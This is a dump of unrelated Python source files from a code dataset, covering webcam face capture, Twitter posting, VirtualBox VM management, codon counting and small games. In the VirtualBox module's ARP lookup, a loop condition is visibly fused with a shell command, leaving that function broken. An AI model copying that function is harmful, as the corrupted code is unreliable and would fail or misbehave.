\")\n\n\nwhile(True):\n conectado, imagem = camera.read() #Realiza a leitura da Web-can\n imagemCinza = cv2.cvtColor(imagem, cv2.COLOR_BGR2GRAY) #Converte a imagem da web-Can em escala de cinza\n facesDetectadas = classificador.detectMultiScale(imagemCinza, #Vai detectar as faces \"detectmultiscale\" da imagem web-can\n scaleFactor= 1.5, #Indica a escala da imagem\n minSize= (150,150)) #Tamanho mínimo para fazer a detecção de faces\n\n for(x, y, l, a) in facesDetectadas: #Retangulo que imprime em volta das faces detectadas\n cv2.rectangle(imagem, (x, y), (x + l, y + a), (0,0,255), 2)\n # Ponto Inicial e final da face | Ponto final do quadrado | Valor RGB da cor do quadrado | borda do quadrado.\n\n regiao = imagem[y:y + a, x:x + l] #Está somente a face\n regiaoCinzaOlho = cv2.cvtColor(regiao, cv2.COLOR_BGR2GRAY)\n olhosDetectados = classificadorOlho.detectMultiScale(regiaoCinzaOlho)\n\n for (ox, oy, ol, oa) in olhosDetectados:\n cv2.rectangle(regiao, (ox, oy), (ox + ol, oy + oa), (0, 255,0), 2) #Cor em BGR\n\n\n if cv2.waitKey(1) & 0XFF == ord('q'): #Esperar a tecla Q\n imagemFace = cv2.resize(imagemCinza[y:y + a, x:x + l], (largura, altura)) #Redimensiona a imagem\n cv2.imwrite(\"fotos/pessoa.\" + str(id) + \".\" + str(amostra) + \".jpg\", imagemFace) #Gravando a imagem no diretório\n print(\"[foto \" + str(amostra) + \"capturada com sucesso]\")\n amostra +=1 #Incrementando o valor\n\n cv2.imshow(\"Face\", imagem) #Mostra a imagem capturada da Web-Can\n cv2.waitKey(1) #Aguardar o click de uma tecla\n\n if (amostra >= numeroAmostras +1):\n break\n\nprint(\"Todas as Faces foram capturadas com sucesso\")\ncamera.release()\ncv2.destroyAllWindows()\n\n\n\n","sub_path":"captura.py","file_name":"captura.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"487828562","text":"import cv2 as cv\n\nimg = cv.imread('messi5.png')\nimgray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\nret, thresh = cv.threshold(imgray, 127, 255, 0)\ncontours, hierarchy = cv.findContours(thresh, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\ncnt = contours[4]\ncv.drawContours(img, [cnt], 0, (0, 255, 0), 3)\n\n# 最小外圆\n(x, y), radius = cv.minEnclosingCircle(cnt)\ncenter = (int(x), int(y))\nradius = int(radius)\ncv.circle(img, center, radius, (0, 255, 0), 2)\n","sub_path":"4_OPENCV中的图像处理/4_9_OpenCV 中的轮廓.py","file_name":"4_9_OpenCV 中的轮廓.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"300739835","text":"import time\n\nfrom .check_alarm import check_alarm\nfrom .call_notification import call_notification\n\n##\n# manually_set_alarm\n#\ndef manually_set_alarm():\n '''\n @summary let the user manually set the alarm\n\n @desc When user continuously denies the alarms attempted to be set by Pylarm then the\n user will now have the option to set their own alarm in the format of\n \"MM DD YYYY HH:MM(am/pm)\" e.g. 
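The contour snippet ends with cv.minEnclosingCircle; the same call works directly on a float32 point array, no image needed. For an acute triangle the minimum enclosing circle coincides with the circumcircle — here centre (2, 5/6) and radius 13/6, up to OpenCV's iterative tolerance:

import numpy as np
import cv2 as cv

pts = np.array([[0, 0], [4, 0], [2, 3]], np.float32).reshape(-1, 1, 2)
(x, y), radius = cv.minEnclosingCircle(pts)
print((round(x, 2), round(y, 2)), round(radius, 2))  # ~ (2.0, 0.83) 2.17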
\"08 03 2019 10:45pm\"\n\n @author Brandon Benefield\n @since v1.0.0\n\n @param {void}\n @return {void}\n '''\n # have user manually set their alarm\n alarm_time = input('Manually set the alarm: MM DD YYYY HH:MM(am/pm)')\n # parse the alarm string into datetime tuple\n p_alarm_time = time.strptime(alarm_time, '%m %d %Y %I:%M%p')\n # parse datetime tuple into integer of seconds\n mk_time = time.mktime(p_alarm_time)\n # get time when alarm should go off\n seconds_until_alarm = int(mk_time * 1) - int(time.time() * 1)\n\n print(f'\\nThe alarm has been set and will go off at {time.ctime(mk_time)}\\n')\n check_alarm(seconds_until_alarm)\n call_notification()","sub_path":"src/helpers/manually_set_alarm.py","file_name":"manually_set_alarm.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"389001147","text":"class BotImpostor():\n x = 0\n y = 0\n w = 0\n h = 0\n speed = 2\n time = 0\n select = False\n after_kill_u = False\n dir_of_bot_impstor = None\n select_impostor = False\n dir_list = [\"LEFT\",\"RIGHT\",\"UP\",\"DOWN\"]\n skin = None\n\n xb = 0\n yb = 0\n wb = 0\n hb = 0\n\n def __init__(self, x, y, w, h, skin, xb, yb, wb, hb):\n self.x = x\n self.y = y\n self.w = w\n self.h = h\n self.skin = skin\n\n self.xb = xb\n self.yb = yb\n self.wb = wb\n self.hb = hb\n\n def show(self):\n image(self.skin, self.x, self.y, self.w, self.h)\n\n def show_to_hide_impostor(self):\n rect(self.xb, self.yb, self.wb, self.hb)\n fill(0,0,0)\n text('Press to hide The impostor', self.xb, self.yb, self.wb, self.hb)\n\n def press_to_hide_impostor(self):\n if mouseX > self.xb - self.wb/2 and mouseX < self.xb + self.wb/2 and mouseY > self.yb - self.hb/2 and mouseY < self.yb + self.hb/2:\n self.select_impostor = True\n\n def move(self):\n if (millis() - self.time) >= 1000:\n self.time = millis()\n self.dir_of_bot_impstor = self.dir_list[int(random(0,4))]\n\n if self.dir_of_bot_impstor == self.dir_list[0]:\n self.x = self.x - self.speed\n elif self.dir_of_bot_impstor == self.dir_list[1]:\n self.x = self.x + self.speed\n elif self.dir_of_bot_impstor == self.dir_list[2]:\n self.y = self.y - self.speed\n elif self.dir_of_bot_impstor == self.dir_list[3]:\n self.y = self.y + self.speed\n\n if self.x > width:\n self.dir_of_bot_impstor = self.dir_list[0]\n elif self.x < 0:\n self.dir_of_bot_impstor = self.dir_list[1]\n elif self.y > height:\n self.dir_of_bot_impstor = self.dir_list[2]\n elif self.y < 0:\n self.dir_of_bot_impstor = self.dir_list[3]\n\n def kill_player(self, list_of_rect):\n if self.x > list_of_rect[0]:\n self.x = self.x + self.speed\n elif self.x < list_of_rect[1]:\n self.x = self.x - self.speed\n elif self.y > list_of_rect[2]:\n self.y = self.y + self.speed\n elif self.x < list_of_rect[3]:\n self.y = self.y - self.speed\n\n def distance(self, player_x, player_y, player_w, player_h):\n dx = abs(player_x - self.x)\n dy = abs(player_y - self.y)\n if dx <= player_w/2+self.w/2 and dy <= player_h/2+self.h/2:\n self.select = True\n\n def kill_you(self):\n textSize(45)\n fill(0,0,0)\n text('YOU ARE DEAD', width/2, height/2-150)\n textSize(24)\n self.after_kill_u = True\n","sub_path":"bot_impostor.py","file_name":"bot_impostor.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"453148478","text":"import json\nimport oauth2 as oauth\n\n\n\nAPI_KEY=''\n\nAPI_SECRET=''\n\nCONSUMER_KEY=''\n\nCONSUMER_SECRET=''\n\n\n#url = 
'https://api.twitter.com/1.1/account/verify_credentials.json'\n\nconsumer = oauth.Consumer(key=CONSUMER_KEY, secret=CONSUMER_SECRET)\naccess_token = oauth.Token(key=API_KEY, secret=API_SECRET)\nclient = oauth.Client(consumer, access_token)\n\n#timeline_endpoint= \"https://api.twitter.com/1.1/statuses/home_timeline.json\"\n#tweetsearch = \"https://api.twitter.com/1.1/search/tweets.json?q=\"\n#response, data = client.request(timeline_endpoint)\n#response, searchin = client.request(tweetsearch)\n#\"https://api.twitter.com/1.1/search/tweets.json?q=nasa&result_type=popular\"\n\n#tweets = json.loads(data)\n#for tweet in tweets:\n#    print(tweet['text'])\n\n\n\nin1 = input(\"For statuses on home timeline, type home: \")\n\nin2 = input(\"Please type what you'd like to search for - example nasa\")\n\nupin2 = \"{}&result_type=popular\".format(in2)\n\nsearch = \"https://api.twitter.com/1.1/search/tweets.json?q={}\".format(upin2)\n\n\n\nif in1 == \"home\":\n    url_home = \"https://api.twitter.com/1.1/statuses/home_timeline.json\"\n    print(url_home)\n\nsearch = \"https://api.twitter.com/1.1/search/tweets.json?q={}\".format(upin2)\n\n# actually issue the search request so the response can be parsed below\nresponse, searchin = client.request(search)\n\nsearchtest = json.loads(searchin)\n#search = searchtest{ }\nfor key, value in searchtest.items():\n    print(key, value)\n#for tweet in searchtest:\n#    print(tweet['text'])\n","sub_path":"twt12.py","file_name":"twt12.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"335927716","text":"import sys\nimport tweepy\nfrom tweetkeys import *\nfrom wand.image import Image\nimport platform\nimport os\n## for second version, because problems with Wand on OSX\n#from svglib.svglib import svg2rlg\n#from reportlab.graphics import renderPM\nimport subprocess # May want to use subprocess32 instead\n\n\nprint(\"invoking TWEEEEEETING\")\nprint(platform.system())\n\n# ## get ourselves the image we need (convert svg to jpg)\n# with Image(filename=sys.argv[2]) as img:\n#     img.format = 'jpeg'\n#     img.save(filename='out.jpg')\n\n\n# pi = tweepy.API(auth) \n# tweet = sys.argv[1] # some text + \n# image_path = \"tmp/out2.jpg\" # jpg created above or in plotrender.py\n# print(image_path)\n# # to attach the media file \n# #status = \n# api.update_with_media(image_path, tweet) \n# # api.update_status(status = tweet) \n\n##### using wand on OSX renders erroneously, \n\n# def convertSVGtoTweet(svg, tweettext):\n#     with Image(filename=svg) as img:\n#         img.format = 'jpeg'\n#         img.save(filename='tweet.jpg')\n#     # authentication \n#     auth = tweepy.OAuthHandler(consumer_key, consumer_secret) \n#     auth.set_access_token(access_token, access_token_secret) \n#     api = tweepy.API(auth) \n#     tweet = tweettext\n#     image_path = \"tweet.jpg\" # jpg created above\n#     print(image_path, tweet)\n#     # to attach the media file \n#     #status = \n#     api.update_with_media(image_path, tweet) \n#     # api.update_status(status = tweet) \n\n\n\n\ndef TweetImgTxt(image_path, tweettext):\n\n    auth = tweepy.OAuthHandler(consumer_key, consumer_secret) \n    auth.set_access_token(access_token, access_token_secret) \n    api = tweepy.API(auth) \n    print (dir(api))\n    tweet = tweettext\n    # image_path = \"tweet.png\" # png created above\n    print(image_path, tweet)\n    # to attach the media file \n    #status = \n\n    ## deprecated method\n    #api.update_with_media(image_path, tweet) \n    # api.update_status(status = tweet) \n    ## new method\n    file=open(image_path, 'rb')\n    media_id = api.media_upload(filename=image_path, file=file)\n    # 
api.update_with_updatemedia(file, tweet) \n    # api.update_status(status = tweet) \n\n    print(media_id)\n    #https://docs.tweepy.org/en/v4.0.0/api.html#tweepy.API.simple_upload\n    api.update_status(tweet, media_ids=[media_id.media_id_string])\n    #https://stackoverflow.com/questions/37050450/tweepy-python-library-media-ids-parameter-is-invalid-and-tweet-must-not-have\n    \ndef convertSVGtoTweet(svg, tweettext):\n    print(svg)\n    pltfrm = platform.system()\n    if (pltfrm == 'Darwin'):\n        cmd_list = [ '/Applications/Inkscape.app/Contents/MacOS/inkscape','--export-filename=tweet.png', svg ]\n        p = subprocess.Popen( cmd_list, stdout=subprocess.PIPE, stderr=subprocess.PIPE )\n        out, err = p.communicate()\n        if p.returncode:\n            raise Exception( 'Inkscape error: ' + (err or '?') )\n    else:\n        # cmd_list = [ '/usr/bin/inkscape','--export-filename=tweet.png', svg ]\n        with Image(filename=svg) as img:\n            img.format = 'png'\n            img.save(filename='tweet.png')\n    auth = tweepy.OAuthHandler(consumer_key, consumer_secret) \n    auth.set_access_token(access_token, access_token_secret) \n    api = tweepy.API(auth) \n    tweet = tweettext\n    image_path = \"tweet.png\" # png created above\n    print(image_path, tweet)\n    # to attach the media file \n    #status = \n\n    ## deprecated method\n    #api.update_with_media(image_path, tweet) \n    # api.update_status(status = tweet) \n    ## new method\n    file=open(image_path, 'rb')\n    media_id = api.media_upload(filename=image_path, file=file)\n\n    # media_id = api.simple_upload(filename=image_path, file=file)\n    print(media_id)\n    #https://docs.tweepy.org/en/v4.0.0/api.html#tweepy.API.simple_upload\n    api.update_status(tweet, media_ids=[media_id.media_id_string])\n    #https://stackoverflow.com/questions/37050450/tweepy-python-library-media-ids-parameter-is-invalid-and-tweet-must-not-have\n    \n    ","sub_path":"lib/tweetplot.py","file_name":"tweetplot.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"165383427","text":"from selenium import webdriver\nimport time\nimport json\n\ndriver = webdriver.Chrome(executable_path='chromedriver.exe')\ndriver.get('https://ngs.ru/text/')\n\narticles = driver.find_elements_by_css_selector('div:nth-child(3)>article')\nnews = []\nf = open('data.json', 'w')\n\nfor article in articles:\n    link = article.find_element_by_tag_name('a').get_attribute('href')\n    title = article.find_element_by_css_selector('div>div>h2>a>span').text\n    news.append({'title' : title, 'link' : link, 'text' : None })\n\nfor n in news:\n    print(n['link'])\n    time.sleep(2)\njson.dump(news, f)\ndriver.close()","sub_path":"ngs.py","file_name":"ngs.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"371841964","text":"import csv\nimport numpy as np\nfrom scipy import stats\nimport sys\n\n# The purpose of this file is to go through a flat file containing\n# non-overlapping viral genes and to count the occurrences of start and\n# stop codons in the gene's alternative reading frames.\n\n# Specify the name of the flat file containing the genes\nfilename = 'VirusGenes_Nonoverlapping_Controls_Complete.txt'\n\n# All counters are defined and set to 0\n\n# The first set of counters will keep track of the total number of\n# codons in the +1 and +2 frames\nPlusOneCodons = 0\nPlusTwoCodons = 0\n\n# The second set will keep track of the number of stop codons\n# that occur in the +1 and +2 frames, respectively\nPlusOneStops = 0\nPlusTwoStops = 0\n\n# The 
final set will keep track of the number of start codons that\n# occur in the +1 and +2 frames, respectively\nPlusOneStarts = 0\nPlusTwoStarts = 0\n\n\n\n# The flat file is opened using the csv module. The flat file should be\n# in tab-delimited format. If it's not, the delimiter can be changed\n# to match the format.\nwith open('%s'%filename, 'r') as f:\n reader = csv.reader(f, delimiter = '\\t')\n for row in reader:\n # The first element in the flat file is the database UID, followed by the\n # gene's nucleotide sequence.\n UID = row[0]\n Sequence_0 = row[1]\n # The nucleotide sequence length is found\n GeneLength = len(Sequence_0)\n # it is then used to artificially shift the sequence into its +1 frame.\n # The sequence is ended two nucleotides prematurely to make sure that the\n # sequence stays a multiple of 3 in length (the final two nucleotides don't\n # constitute a codon). The same procedure is used to shift the sequence\n # into its +2 frame, except it is truncated one nucleotide from the end instead\n # of two.\n Sequence_1 = Sequence_0[1:GeneLength-2]\n Sequence_2 = Sequence_0[2:GeneLength-1]\n\n # +1 Frame Counting block\n \n # The length of the sequence in its +1 frame is noted\n Length_1 = len(Sequence_1)\n # Then a list of indices is compiled ranging from 0 to the length of the sequence\n # using a step size of 3. This translates to a list of indices that correspond to\n # the first nucleotide in each codon in the sequence. \n Index_1 = range(0,len(Sequence_1),3)\n # Scanning the nucleotide sequence by running through the indices previously collected\n for n in Index_1:\n # m is defined to be n+3 so that Sequence[n:m] is the codon starting at index n\n m = n+3\n Codon = Sequence_1[n:m]\n # 1 is added to the total codon counter\n PlusOneCodons +=1\n # If the codon is a stop codon, it is counted by the relevant stop codon counter\n if Codon == 'TAA' or Codon == 'TAG' or Codon == 'TGA':\n PlusOneStops += 1\n # If the codon is a start codon, it is counted by the relevant start codon counter\n if Codon == 'ATG':\n PlusOneStarts += 1\n\n\n\n # +2 Frame Counting - this is the same as the previous block, except is for the gene\n # in its +2 reading frame\n Length_2 = len(Sequence_2)\n Index_2 = range(0,len(Sequence_2),3)\n for n in Index_2:\n m = n+3\n Codon = Sequence_2[n:m]\n PlusTwoCodons += 1\n if Codon == 'TAA' or Codon == 'TAG' or Codon == 'TGA':\n PlusTwoStops += 1\n if Codon == 'ATG':\n PlusTwoStarts += 1\n\n# The results are then printed for the user\nprint()\nprint('Plus One Frame:')\nprint('Total Number of Codons: %s' %PlusOneCodons)\nprint('Number of Start Codons: %s' %PlusOneStarts)\nprint('Percentage of Total: %.2f%%' %((PlusOneStarts/PlusOneCodons)*100))\nprint('1 in %d +1 Codons are Starts\\n' %(PlusOneCodons/PlusOneStarts))\nprint('Number of Stop Codons: %s' %PlusOneStops)\nprint('Percentage of Total: %.2f%%' %((PlusOneStops/PlusOneCodons)*100))\nprint('1 in %d +1 Codons are Stops\\n' %(PlusOneCodons/PlusOneStops))\n\nprint()\nprint('Plus Two Frame:')\nprint('Total Number of Codons: %s' %PlusTwoCodons)\nprint('Number of Start Codons: %s' %PlusTwoStarts)\nprint('Percentage of Total: %.2f%%' %((PlusTwoStarts/PlusTwoCodons)*100))\nprint('1 in %d +2 Codons are Starts\\n' %(PlusTwoCodons/PlusTwoStarts))\nprint('Number of Stop Codons: %s' %PlusTwoStops)\nprint('Percentage of Total: %.2f%%' %((PlusTwoStops/PlusTwoCodons)*100))\nprint('1 in %d +2 Codons are Stops\\n' 
%(PlusTwoCodons/PlusTwoStops))\n\n","sub_path":"Start_Stop_CodonCounter/StopStartCodonCounter.py","file_name":"StopStartCodonCounter.py","file_ext":"py","file_size_in_byte":4524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"348720616","text":"\nfrom ansible.module_utils.basic import AnsibleModule\nimport virtualbox\nfrom threading import Thread\nimport time\nimport subprocess\n#from virtualbox import LockType\n\nvbox=virtualbox.VirtualBox()\n\ndef create_machine(template,machine_name):\n    template=vbox.find_machine(template)\n    machine=template.clone(name=machine_name)\n    return machine\n\ndef delete_machine(vm):\n    vm.remove(delete=True)\n\ndef start_machine(vm,memory,nbcpu):\n    if is_machine_stopped(vm):\n        session=vm.create_session()\n        session.machine.memory_size=memory\n        session.machine.cpu_count=nbcpu\n        session.machine.save_settings()\n        session.unlock_machine()\n\n        progress=vm.launch_vm_process(type_p='headless')\n        #progress=vm.launch_vm_process(session,'headless','')\n\n\ndef stop_machine(vm):\n    if not is_machine_stopped(vm):\n        session=vm.create_session()\n        session.console.power_down()\n\n\ndef get_machine(machine_name):\n    for machine in vbox.machines:\n        if machine.name==machine_name:\n            return machine\n    return None\n\n\ndef is_machine_stopped(machine):\n    return (machine.state==1) or (machine.state==2) or (machine.state==3) or (machine.state==4)\n\n\ndef find_ip_using_arp(mac_address,timeout_in_s,network_range):\n    ip=None\n    stoptime=int(time.time())+int(timeout_in_s)\n    firsttime=True\n    while ip==None and int(time.time())<stoptime:\n        if not firsttime:\n            time.sleep(1)\n        firsttime=False\n        # scan the range so the ARP cache gets populated, then dump it\n        # (the original scan command was lost; an nmap ping-scan is assumed here)\n        arplines=subprocess.check_output(\"nmap -sP %s >/dev/null ; arp -n\" % network_range,shell=True).split('\\n')\n        arpdict=dict()\n        for arpline in arplines[+1:-1]:\n            arprecord=arpline.split()\n            mac=arprecord[2].replace(\":\",\"\").upper()\n            ip=arprecord[0]\n            arpdict[mac]=ip\n        ip=arpdict.get(mac_address.upper())\n    return ip\n\n\n\ndef gather_facts(vm,arp_wait_timeout_in_s,network_range,network_interface):\n    facts=dict()\n    if vm is None:\n        facts['vb_name']='!!!VM_NOT_FOUND!!!'\n        return facts\n\n    facts['vb_name']=vm.name\n    adapter=vm.get_network_adapter(network_interface)\n    mac=adapter.mac_address\n    facts['vb_mac']=mac\n    if not is_machine_stopped(vm):\n        facts['vb_ip']=find_ip_using_arp(mac,arp_wait_timeout_in_s,network_range)\n    return facts\n\n\ndef main():\n    # This module WANT_JSON (do not change this comment, because Ansible uses it)\n    module = AnsibleModule(\n        argument_spec = dict(\n            state     = dict(default='running', choices=['present', 'absent', 'running','stopped']),\n            name      = dict(required=True),\n            memory    = dict(default=1024),\n            nbcpu     = dict(default=1),\n            arp_wait_timeout = dict(default='60'),\n            template  = dict(default='ubuntu'),\n            network_range = dict(default=\"0.0.0.0-0\"),\n            network_interface = dict(default=1)\n        )\n    )\n\n    # fill this with info that you want added to the ansible environment\n    # http://docs.ansible.com/developing_modules.html#module-provided-facts\n    facts = dict()\n    name=module.params['name']\n    target_state=module.params['state']\n    template=module.params['template']\n    arp_wait_timeout=module.params['arp_wait_timeout']\n    memory=int(module.params['memory'])\n    nbcpu=int(module.params['nbcpu'])\n    network_range=module.params['network_range']\n    network_interface=int(module.params['network_interface'])\n    vm=get_machine(name)\n    changed=False\n    facts=gather_facts(vm,arp_wait_timeout,network_range,network_interface)\n\n    if target_state=='absent':\n        if vm is None:\n            module.exit_json(changed=False, msg=\"VM does not exist\", ansible_facts=facts)\n        else:\n            if 
module.check_mode:\n module.exit_json(changed=True, msg=\"VM has to be destroyed\", ansible_facts=facts)\n delete_machine(vm)\n module.exit_json(changed=True, msg=\"VM has been destroyed\", ansible_facts=facts)\n else:\n if vm is None:\n if module.check_mode:\n module.exit_json(changed=True, msg=\"VM has to be created\", ansible_facts=facts)\n else:\n vm=create_machine(template,name)\n facts=gather_facts(vm,arp_wait_timeout,network_range,network_interface)\n changed=True\n if target_state=='stopped':\n if not is_machine_stopped(vm):\n facts=gather_facts(vm,arp_wait_timeout,network_range,network_interface)\n if module.check_mode:\n module.exit_json(changed=True, msg=\"VM has to be stopped\", ansible_facts=facts)\n stop_machine(vm)\n module.exit_json(changed=True, msg=\"VM was stopped\", ansible_facts=facts)\n elif target_state=='running':\n if is_machine_stopped(vm):\n if module.check_mode:\n module.exit_json(changed=True, msg=\"VM has to be started\", ansible_facts=facts)\n start_machine(vm,memory,nbcpu)\n facts=gather_facts(vm,arp_wait_timeout,network_range,network_interface)\n module.exit_json(changed=True, msg=\"VM was started\", ansible_facts=facts)\n facts=gather_facts(vm,arp_wait_timeout,network_range,network_interface)\n if changed:\n module.exit_json(changed=True, msg=\"VM was created\", ansible_facts=facts)\n module.exit_json(changed=False, msg=\"did nothing\", ansible_facts=facts)\n # ... otherwise, if failure\n # module.fail_json(msg=\"explain why the module failed here\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ansible/library/virtualboxvm.py","file_name":"virtualboxvm.py","file_ext":"py","file_size_in_byte":5642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"6330101","text":"import pandas as pd\nfrom submodules import data_io\n\ndef dataset_to_dataframe( text, label, file_name ):\n df = pd.DataFrame( { 'text' : text,\n 'sentiment_numeric':label } )\n df.to_csv( file_name, sep=\";\", index=None )\n\n\nif __name__ ==\"__main__\":\n CHUNKS_PATH = \"chunks/yahoo_data_sentiment_classification_chunk_{}.csv\"\n CHUNK_LEN = 5\n all_source_sentences, all_labels = data_io.load_data_from_chunks( CHUNKS_PATH, CHUNK_LEN )\n\n chunk1_sentences = all_source_sentences[0]\n chunk1_labels = all_labels[0]\n\n chunk2_sentences = all_source_sentences[1]\n chunk2_labels = all_labels[1]\n\n chunk3_sentences = all_source_sentences[2]\n chunk3_labels = all_labels[2]\n\n chunk4_sentences = all_source_sentences[3]\n chunk4_labels = all_labels[3]\n\n chunk5_sentences = all_source_sentences[4]\n chunk5_labels = all_labels[4]\n\n dataset_to_dataframe( chunk1_sentences, chunk1_labels, 'yahoo_growing_dataset/yahoo_growing_dataset_1.csv' )\n\n vergleichsnetz_zweites_trainingsset_sentences= chunk1_sentences + chunk2_sentences\n vergleichsnetz_zweites_trainingsset_labels = chunk1_labels + chunk2_labels\n dataset_to_dataframe( vergleichsnetz_zweites_trainingsset_sentences, vergleichsnetz_zweites_trainingsset_labels, 'yahoo_growing_dataset/yahoo_growing_dataset_2.csv' )\n\n\n vergleichsnetz_drittes_trainingsset_sentences = chunk1_sentences + chunk2_sentences + chunk3_sentences\n vergleichsnetz_drittes_trainingsset_labels = chunk1_labels + chunk2_labels + chunk3_labels\n dataset_to_dataframe( vergleichsnetz_drittes_trainingsset_sentences, vergleichsnetz_drittes_trainingsset_labels, 'yahoo_growing_dataset/yahoo_growing_dataset_3.csv' )\n\n\n vergleichsnetz_viertes_trainingsset_sentences = chunk1_sentences + chunk2_sentences + chunk3_sentences 
+ chunk4_sentences\n vergleichsnetz_viertes_trainingsset_labels = chunk1_labels + chunk2_labels + chunk3_labels + chunk4_labels\n dataset_to_dataframe( vergleichsnetz_viertes_trainingsset_sentences, vergleichsnetz_viertes_trainingsset_labels, 'yahoo_growing_dataset/yahoo_growing_dataset_4.csv' )\n\n\n vergleichsnetz_fuenftes_trainingsset_sentences = chunk1_sentences + chunk2_sentences + chunk3_sentences + chunk4_sentences + chunk5_sentences\n vergleichsnetz_fuenftes_trainingsset_labels = chunk1_labels + chunk2_labels + chunk3_labels + chunk4_labels + chunk5_labels\n dataset_to_dataframe( vergleichsnetz_fuenftes_trainingsset_sentences, vergleichsnetz_fuenftes_trainingsset_labels, 'yahoo_growing_dataset/yahoo_growing_dataset_5.csv' )\n","sub_path":"experiment_4.5.1_shared_datapool/experiment_yahoo/merge_chunks.py","file_name":"merge_chunks.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"341676462","text":"#!/usr/bin/env python\nimport freenect\nimport cv2\nimport numpy as np\n\n\nthreshold = 100\ncurrent_depth = 0\n\ndef change_threshold(value):\n global threshold\n threshold = value\n\n\ndef change_depth(value):\n global current_depth\n current_depth = value\n\n\ndef show_depth():\n global threshold\n global current_depth\n\n depth, timestamp = freenect.sync_get_depth()\n depth = 255 * np.logical_and(depth >= current_depth - threshold,\n depth <= current_depth + threshold)\n depth = depth.astype(np.uint8)\n cv2.imshow('Depth', depth)\n\n\ndef show_video():\n cv2.imshow('Video', freenect.sync_get_video(format=freenect.VIDEO_IR_8BIT)[0])\n\n\ncv2.namedWindow('Depth')\ncv2.namedWindow('Video')\ncv2.createTrackbar('threshold', 'Depth', threshold, 500, change_threshold)\ncv2.createTrackbar('depth', 'Depth', current_depth, 2048, change_depth)\n\nprint('Press ESC in window to stop')\n\n\nwhile 1:\n show_depth()\n show_video()\n if cv2.waitKey(10) == 27:\n break\n","sub_path":"test_files/getting_frames_without_ano_obj.py","file_name":"getting_frames_without_ano_obj.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"368719276","text":"class BenchCommandBuilder():\n\n def buildCommandString(self, inDir, outDir, cmd, args):\n pythonPath = \"/usr/bin/python\"\n benchPath = \"./\"\n\n benchCommand = 'bench.py --save res.csv --cases ' + inDir\n\n if outDir != None and len(outDir) > 0:\n benchCommand = benchCommand + ' --output ' + outDir\n\n benchCommand = benchCommand + ' ' + cmd\n\n if args != None and len(args) > 0:\n benchCommand = benchCommand + ' ' + args\n\n return pythonPath + ' ' + benchPath + benchCommand\n\n def buildCommand(self, inDir, outDir, cmd, args):\n return self.buildCommandString(inDir, outDir, cmd, args).split(\" \")\n\n","sub_path":"BenchCommandBuilder.py","file_name":"BenchCommandBuilder.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"610837280","text":"#Must be run after arduino starts sending\nfrom bluetooth import *\nimport requests,json\n\nurl = \"http://127.0.0.1:5000/sposition\"\nclient_socket=BluetoothSocket(RFCOMM)\n\nclient_socket.connect((\"98:D3:51:FD:AB:20\",1))\n\ni = 0;\n\nwhile True:\n msg = client_socket.recv(255) #1024\n \n if msg == '[':\n continue\n else : \n msg = msg.replace('[','') #all sorts of exceptions\n msg = msg.replace('\\r','')\n dic = msg.split('\\n')\n 
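# int() below can fail when a packet arrives split across reads, hence the try/except\n        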
try:\n            print([int(dic[0]),int(dic[1])]) #also exception-proof\n        except:\n            #print('error')\n            continue\n        \nprint(\"Finished\")\nclient_socket.close()","sub_path":"arduino_raspi_connection/raspi/connect_2.py","file_name":"connect_2.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"391271520","text":"###############################################################################\n\nfrom .voice import Voice\n\n\n## A class representing a measure of music.\nclass Bar:\n    ## Initializes a Bar and its seven attributes self.id, self.clef,\n    # self.key, self.meter, self.voices, self.barline, and self.partial.\n    # @param bid A unique integer identifier for the bar's id attribute.\n    # @param clef A Clef for the bar's clef attribute. Defaults to None.\n    # @param key A Key for the bar's key attribute. Defaults to None.\n    # @param meter A Meter for the bar's meter attribute. Defaults to None.\n    # @param barline A Barline for the bar's barline attribute.\n    # Defaults to None.\n    # @param partial A boolean value for the bar's partial attribute. If true\n    # the bar is an incomplete (e.g. pickup) measure. Defaults to False.\n    #\n    # Initialize self.voices to an empty list and self.staff to None.\n    # See also: Staff, Voice, https://en.wikipedia.org/wiki/Bar_(music)\n    def __init__(self, bid, clef=None, key=None, meter=None, barline=None, partial=False):\n        self.id = bid\n        self.clef = clef\n        self.key = key\n        self.meter = meter\n        self.barline = barline\n        self.partial = partial\n        self.voices = []\n        self.staff = None\n\n    ## Returns a string showing the bar's unique id and all attributes\n    # except self.voices if that attribute is not None. The order of\n    # printing is id, clef, key, meter, barline, followed by the\n    # hex id of the instance.\n    # Example: '<Bar: 0 Treble A-Major 4/4 Standard 0x...>' (hex id varies)\n    def __str__(self):\n        to_return = f'<Bar: {self.id} {self.clef} {self.key} {self.meter} {self.barline} {hex(id(self))}>'\n        return to_return\n\n    ## Define __repr__ to be the same as __str__ except there is\n    # no hex id included.\n    # Example: '<Bar: 0 Treble A-Major 4/4 Standard>'\n    def __repr__(self):\n        to_return = 